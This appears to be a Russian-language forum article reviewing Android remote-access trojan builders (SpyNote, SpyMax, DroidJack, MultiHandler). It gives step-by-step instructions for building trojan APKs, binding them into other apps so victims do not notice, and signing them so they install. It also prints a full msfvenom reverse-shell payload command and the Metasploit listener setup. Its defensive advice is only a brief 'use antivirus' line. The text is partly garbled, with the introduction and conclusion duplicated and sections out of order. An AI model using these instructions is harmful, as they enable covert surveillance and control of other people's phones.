Проснулся с ужасной болью в голове и понял, что давно ничего не писал. Идея мелькала перед глазами давно, а ещё и достаточное количество материала сподвигло на этот шаг, написания ещё одного миниатюрного исследование. На этот раз испытаниям и издевательствам я подверг несколько программ для создания RAT для мобильных устройств - Android. Получилась объемная и интересная статья, как мне кажется.. Запасайтесь попкорном и выпивкой, а мы начинаем.
Введение
Для того, чтобы говорить о чём-то и комфортабельно обсуждать это что-то, сперва нужно прояснить себе мозг о этом объекте дискуссии. Речь, для начала, пойдёт о RAT.
Google гласит такое: ”RAT — аббревиатура англ. Remote Access Trojan, в переводе — «средство удалённого администрирования» или «средство удалённого управления» или «Троян удаленного доступа» Термин получил распространение среди системных администраторов и хакеров”.
Давайте разберёмся, что такое RAT
RAT - аббревиатура, что дословно рассшифровывается, как Remote Administration Tool. В дословном переводе означает - Утилита для удалённого администрирования. В идеальных условиях представляет из себя программное обеспечение, что зачастую представлено в схеме “Клиент- Сервер”. И речь идёт не о Dark Comet или тому подобных вирусных RAT’ах, а о подобии Team Viewer.
Но коль есть возможность управлять удалённо устройством, хацкеры спать не могли и после этого появились всем знакомые и простые до боли NJRAT, Comet и тому подобные.
На RAT для windows есть куча анализов и обзоров, поскольку такого много. Я решил написать то, что до меня никто не писал. Например анализ самых популярных программ для удалённого доступа для Android. Сказанное и показанное ниже, не призыв к действию, ловите дисклеймер:
Среди основного функционала хотелось бы отметить такие особенности, как:
SpyMAX
Когда я вплотную подошёл к тестированию Ahmyht, у меня окончательно вылетел интернет на целые сутки, в результате чего я решил отложить анализ этого приложения “на потом”.
MultiHandler
После устанавливаем APK-шку на андроид, но видим следующее: "Ошибка установки". Погуглив, я нашёл решения этого метода. Установка не происходит потому, что АПК приложения не имеет подписи, но и это дело нам под силу! Естественно, возможно подписать своё приложения с помощью популярных сред разработки приложений, но мне этот вариант был не по душе и мне удалось нарыть приложения Zipsinger, которое в пару кликов его подпишет. После установки к нам летит сессия метерпретер.
Глобальные выводы
Нет смысла затягивать и подробно разъяснять и без того ясные вещи. Способы не идеальны и защитой могут служить светлая голова и осведомлённость. Установите антивирус. Вирусы на андроид есть, не забывайте о этом. Приложения в обзоре представлены в ознакомительных целях. Давайте будем умнее мошенников и школохацкеров. Удачи!.
Введение
Для того, чтобы говорить о чём-то и комфортабельно обсуждать это что-то, сперва нужно прояснить себе мозг о этом объекте дискуссии. Речь, для начала, пойдёт о RAT.
Google гласит такое: ”RAT — аббревиатура англ. Remote Access Trojan, в переводе — «средство удалённого администрирования» или «средство удалённого управления» или «Троян удаленного доступа» Термин получил распространение среди системных администраторов и хакеров”.
Давайте разберёмся, что такое RAT
RAT - аббревиатура, что дословно рассшифровывается, как Remote Administration Tool. В дословном переводе означает - Утилита для удалённого администрирования. В идеальных условиях представляет из себя программное обеспечение, что зачастую представлено в схеме “Клиент- Сервер”. И речь идёт не о Dark Comet или тому подобных вирусных RAT’ах, а о подобии Team Viewer.
Но коль есть возможность управлять удалённо устройством, хацкеры спать не могли и после этого появились всем знакомые и простые до боли NJRAT, Comet и тому подобные.
На RAT для windows есть куча анализов и обзоров, поскольку такого много. Я решил написать то, что до меня никто не писал. Например анализ самых популярных программ для удалённого доступа для Android. Сказанное и показанное ниже, не призыв к действию, ловите дисклеймер:
Итак, рассмотрим самые часто используемые программы для создания вирусного ПО на ваши мобилки, а именно:
- SpyNote
- SpyMax
- DroidJack
- AhMoth
- MultiHandler
- Краткая история о программном обеспечении:
- Мануал по использованию:
- Особенности и недостатки и отчёт VT
- Способы защиты и выводы:
- Никакой истории написания и авторов найти не удалось, только короткие инструкции по использованию подобных вещей, которые трудно назвать благоразумными. В англоязычном гугле и прочих поисковиках - ничего не нашёл. Автор или специально запутал и затёр свои следы или их убрали другие пользователи.
- Переходим к краткому руководству по использованию этого чуда. Тесты проводились на моих устройствах и никто, кроме моего мозга и рассудка не пострадал. Итак, всё классично и равносильно действиям с NJRAT, принцип их работы по сути один - установка сессии через заражённый файл к клиенту у вас.
Среди основного функционала хотелось бы отметить такие особенности, как:
- Возможность записи с микрофона.
- Возможность открыть shell linux’a
- Менеджер файлов и контактов.
- Ну и так далее.
3. Среди недостатков хотелось бы отметить маленький и ужатый функционал по отношению к другим приложениям. Ну и конечно-же высокий коэффициент обнаружения вирусных сигнатур антивирусами. Исходя из суждения о том, что на Android вирусов нет и антивирус не нужен, большинство устройств уязвимы. На новых устройствах, где есть ограничитель фонового трафика, сессия не отмечалась стабильностью и спустя несколько минут сходила на нет.
4. Cо способами защиты всё ясно, это примитивное троянское программное обеспечение, что показало процент обнаружения в соотношении 24\60, исходя с чего обычным антивирусом возможно защититься от подобной дряни.
SpyMAX
- Закрадывается мысль о том, что авторы предыдущего программного обеспечения и этого одни и те же. SpyMAX можно назвать расширенной версией, о чём намекает само название. Есть некоторые отличия в работе, например, требования установки Java. В интернете отсутствует подробная информация о SpyMAX.
- Здесь всё просто и понятно, справился даже ребёнок. Не исключаю, что читают это люди не образованные в этой сфере, поэтому распишу всё подробно. Для начала открываем нашу программку, кликаем на "Bluild", затем прописываем наш IP. После чего потребуется установленный пакет Java. В следующем разделе указываем путь к директории Bin в папке Java. Дальше всё по классике, выставляем название, иконку и тип приложения. Спустя несколько секунд жмем на OK, после чего откроется подобие командной строки, в которой будет отражен процесс создания APK приложения.
- Имеет внушительный функционал, по сравнению со SpyNote. Для некоторых действий требуются права СуперЮзера и полный пакет Java. Сессия не выделилась стабильностью, так-как на новых версиях Андроид есть ограничитель фонового трафика. Процент выявления составил 30/60, что больше чем у предыдущего билдера. В некоторых случаях нужна подпись АПК файла, о которой я уже говорил.
- Основным способом защиты является хороший антивирус с актуальными базами.
- Опять же… Не удалось найти автора, лично мне известно только то, что это ПО одно из самых дорогих на чёрном рынке. В контактах значится Sankevee.
- По традиции открываем наше чудо и выставляем порт для работы. Перейдя в вкладку Generate, замечаем оповещение о том, что IP адрес здесь не подойдёт и нужно использовать только Dynamic DNS, что собственно я и сделаю. После выставляем имя и прочую информацию о файле, жмём на галочку напротив надписи Hide и есть возможность слить наш вирус в единое с каким-то приложениям. При включенном хайд режиме жертва не будет подозревать об установке на её мобильное устройство вредоносного ПО.
- Среди недостатков отмечу наличие сигнатур этого приложения в базах антивируса, в остальном он неплох. Процент обнаружения составил 23/60. Приложения платное и стоит около 200$ на чёрном рынке. Так-же есть куча расширенных опций в окошке Advanced.
- Собственная внимательность и дотошность помогут вам в обнаружении этого всего. Используйте антивирус как вспомогательное средство.
Когда я вплотную подошёл к тестированию Ahmyht, у меня окончательно вылетел интернет на целые сутки, в результате чего я решил отложить анализ этого приложения “на потом”.
MultiHandler
- Это тот эксплоит, о котором можно говорить вечно. Его возможности ограничены только нашей фантазией и поэтому я не мог написать не задев его великой личности. В прошлой статье я уже затрагивал создание пэйлоада под андроид, делается это всё предельно просто и без всяких подводных камней, но есть нюансы.
- Итак, для начала нам понадобится сгенерировать наш пэйлоад. Делается это командой:
Затем осталось только и настроить слушатель под указанный айпи и пэйлоад.Код::msfvenom -p andriod/meterpreter/reverse_tcp lhost=192.168.43.211 lport=8888 > /root/file.apk
Код:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.43.211
set lport 8888
exploitГлобальные выводы
Нет смысла затягивать и подробно разъяснять и без того ясные вещи. Способы не идеальны и защитой могут служить светлая голова и осведомлённость. Установите антивирус. Вирусы на андроид есть, не забывайте о этом. Приложения в обзоре представлены в ознакомительных целях. Давайте будем умнее мошенников и школохацкеров. Удачи!.
